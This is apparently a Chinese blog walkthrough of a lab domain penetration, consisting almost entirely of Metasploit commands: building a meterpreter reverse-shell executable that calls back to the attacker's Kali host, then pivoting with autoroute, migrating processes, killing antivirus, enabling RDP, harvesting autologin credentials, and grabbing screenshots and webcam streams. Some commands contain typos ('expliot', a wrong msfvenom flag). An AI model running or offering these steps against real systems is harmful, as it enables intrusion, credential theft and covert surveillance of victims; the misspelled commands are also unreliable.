攻击机:kali  192.168.44.131

军事区:window7 192.168.44.139   192.168.4.

非军事区: window server 2003  192.168.4.

kali:

返回的连接可以使用background 将当前连接切换到后台运行;

 

3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;

 

4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;

 

msfvenom -l windows/x64/meterpreter/reverse_tcp -lhost=192.168.44.131 -lport=4444 -f exe -o shy.exe

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.44.131

set lport 4444

expliot

 

ipconfig发现另一网段

一次简单的域渗透

run autoroute -s 192.168.4.20/24 添加路由

一次简单的域渗透

run autoroute -p 查看路由是否添加成功

一次简单的域渗透

getpid 查看自己的meterpreter shell 进程号

ps 查看目标机正在运行的进程

migrate pid 将自己的shell进程移动到一个稳定的进程当中。比如Explore.exe.

getpid 发现自己shell的进程号已经改变,说明已经成功迁移到稳定的进程当中。

或者 使用自动迁移命令(run post/windows/manage/migrate)自己寻找合适的进程进行迁移

 run post/windows/manage/migrate 

一次简单的域渗透

run post/windows/gather/checkvm 

idletime

一次简单的域渗透

route

一次简单的域渗透

run post/windows/manage/killav

run post/windows/manage/enable_rdp

一次简单的域渗透

run post/windows/gather/enum_logged_on_users 

一次简单的域渗透

run post/windows/gather/enum_applications

一次简单的域渗透

run windows/gather/credentials/windows_autologin

一次简单的域渗透

load espia

screengrab screenshot

webcam_list  

webcam_snap

webcam_stream

shell exit

一次简单的域渗透

文件系统命令

pwd

getlwd

search -f 123.txt -d c:

download c:/123.txt /root

upload /root/123.txt c:

一次简单的域渗透

 

 

 

 

 

 

 

 

 

 

相关文章:

  • 2021-12-27
  • 2021-06-09
  • 2021-06-27
  • 2021-06-23
  • 2022-12-23
  • 2021-11-18
  • 2022-12-23
  • 2021-07-06
猜你喜欢
  • 2022-12-23
  • 2021-09-14
  • 2021-11-10
  • 2021-08-19
  • 2022-01-04
  • 2022-12-23
  • 2022-01-16
相关资源
相似解决方案